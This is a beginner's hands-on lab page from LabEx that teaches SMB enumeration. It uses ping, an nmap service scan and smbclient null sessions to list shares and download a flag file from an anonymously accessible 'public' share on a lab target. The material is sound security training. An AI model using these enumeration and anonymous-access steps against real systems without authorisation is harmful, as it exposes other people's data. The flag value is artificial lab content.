LabEx
Log InJoin Free

SMB Enumeration and Guest Access

LinuxBeginner
Practice Now

Introduction

Welcome to this hands-on lab focused on Server Message Block (SMB) enumeration and exploitation. SMB is a network file sharing protocol that allows applications on a computer to read and write to files and to request services from server programs in a computer network. Due to its widespread use, it's a common target for attackers.

In this lab, you will step into the shoes of a penetration tester. You'll start with basic network reconnaissance to confirm the target is online. Next, you'll use the powerful scanning tool nmap to discover an open SMB service. Finally, you'll use smbclient to investigate the service, find a misconfiguration that allows anonymous guest access, and retrieve a hidden flag from a public share.

Upon completion, you will understand how to:

  • Verify network connectivity using ping.
  • Scan for open SMB ports and services using nmap.
  • Enumerate and connect to SMB shares using smbclient.
  • Exploit a guest access misconfiguration to retrieve files.

Let's begin.

Verify Connectivity to Target with Ping

In this first step, you'll perform a basic reconnaissance task: verifying that the target machine is online and reachable from your attacker machine. The ping command is a standard utility for this, sending ICMP packets to a host to test for a response.

Your environment includes a target system aliased as target. To confirm connectivity, run the following command in your terminal to send four packets:

ping -c 4 target

The -c 4 flag tells ping to send exactly four packets and then stop. A successful result will look similar to the output below, showing replies from the target. The IP address and time values may differ.

PING target (172.17.0.2) 56(84) bytes of data.
64 bytes from target (172.17.0.2): icmp_seq=1 ttl=64 time=0.086 ms
64 bytes from target (172.17.0.2): icmp_seq=2 ttl=64 time=0.064 ms
64 bytes from target (172.17.0.2): icmp_seq=3 ttl=64 time=0.063 ms
64 bytes from target (172.17.0.2): icmp_seq=4 ttl=64 time=0.064 ms

--- target ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 3069ms
rtt min/avg/max/mdev = 0.063/0.069/0.086/0.010 ms

Seeing "4 received, 0% packet loss" confirms that your machine can communicate with the target, setting the stage for the next phase of enumeration.

Scan Open Ports with Nmap

In this step, you will use nmap (Network Mapper) to scan the target for open ports and identify running services. This is a critical step in finding potential attack vectors. We will focus our scan on the SMB service.

Execute the following nmap command to perform a service version detection (-sV) scan and run a script (--script) to check for SMB protocols on the target:

nmap -sV --script smb-protocols target

After a few moments, nmap will report its findings. The output will look similar to this:

Starting Nmap 7.80 ( https://nmap.org ) at 2025-09-19 10:31 CST
Nmap scan report for target (172.17.0.2)
Host is up (0.00011s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE     VERSION
139/tcp open  netbios-ssn Samba smbd 4.6.2
445/tcp open  netbios-ssn Samba smbd 4.6.2

Host script results:
| smb-protocols:
|   dialects:
|     2.02
|     2.10
|     3.00
|     3.02
|_    3.11

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.40 seconds

The output confirms that ports 139/tcp and 445/tcp are open and running the Samba service. Port 445 is the modern port for SMB. This discovery is our cue to investigate the SMB service for vulnerabilities.

Connect to Target via SMB

In this step, you will use the smbclient utility to interact with the SMB service on the target. Your goal is to see if you can connect without a password, a technique known as a "null session" or anonymous login.

First, let's list the available shares on the target. The -L flag lists services, and the -N flag attempts to connect with no password.

Run the following command:

smbclient -L //target -N

If the server is misconfigured to allow guest access, you will see a list of available shares. The output should look similar to this:

        Sharename       Type      Comment
        ---------       ----      -------
        public          Disk
        IPC$            IPC       IPC Service (Samba Server)
SMB1 disabled -- no workgroup available

The key finding here is the public share. The name suggests it might be accessible to anyone. In the next step, you will connect to this share to explore its contents.

Explore Target System and Locate Flag

In this final step, you will connect to the public share you discovered and search for the flag. This simulates the post-exploitation phase, where an attacker searches for valuable data.

Connect directly to the public share using smbclient, again using the -N flag for anonymous access:

smbclient //target/public -N

A successful connection will drop you into an smbclient prompt, which looks like smb: \>. You are now browsing the remote file share.

Try "help" to get a list of possible commands.
smb: \>

Use the ls command to list the contents of the share:

ls

You should see the flag.txt file listed.

smb: \> ls
  .                                   D        0  Fri Sep 19 10:29:39 2025
  ..                                  D        0  Fri Sep 19 10:29:39 2025
  flag.txt                            N       29  Fri Sep 19 10:29:39 2025

  40901312 blocks of size 1024. 22067688 blocks available

Now, download the file to your local machine using the get command:

get flag.txt

Note: The smbclient utility does not have a built-in cat command to view file contents directly. You must download the file first using get.

Once the download is complete, type exit to leave the smbclient session. Finally, use the cat command on your local terminal to display the contents of the downloaded flag.

cat flag.txt

The terminal will display the flag's value.

labex{smb_gu3st_acc3ss_fl4g}

Congratulations! You have successfully enumerated an SMB service, exploited a guest access misconfiguration, and retrieved the flag. Copy the flag value to complete the lab.

Summary

In this lab, you successfully completed a basic penetration test workflow against a misconfigured SMB service. You learned and practiced how to:

  • Use ping to verify network connectivity with a target.
  • Employ nmap to scan for open ports and identify the SMB service.
  • Use smbclient -L to enumerate available network shares anonymously.
  • Connect to an open SMB share with smbclient using a null session.
  • Navigate a remote share and download files using ls and get.

This exercise demonstrates a common and critical vulnerability: allowing anonymous or guest access to network shares. Such misconfigurations can lead to sensitive data exposure. By understanding how to find and exploit these weaknesses, you are better prepared to secure your own systems against them.

Related Linux Courses
Quick Start with Linux

Quick Start with Linux

linux
Become a Junior System Administrator

Become a Junior System Administrator

linuxshell
Linux for Noobs

Linux for Noobs

linux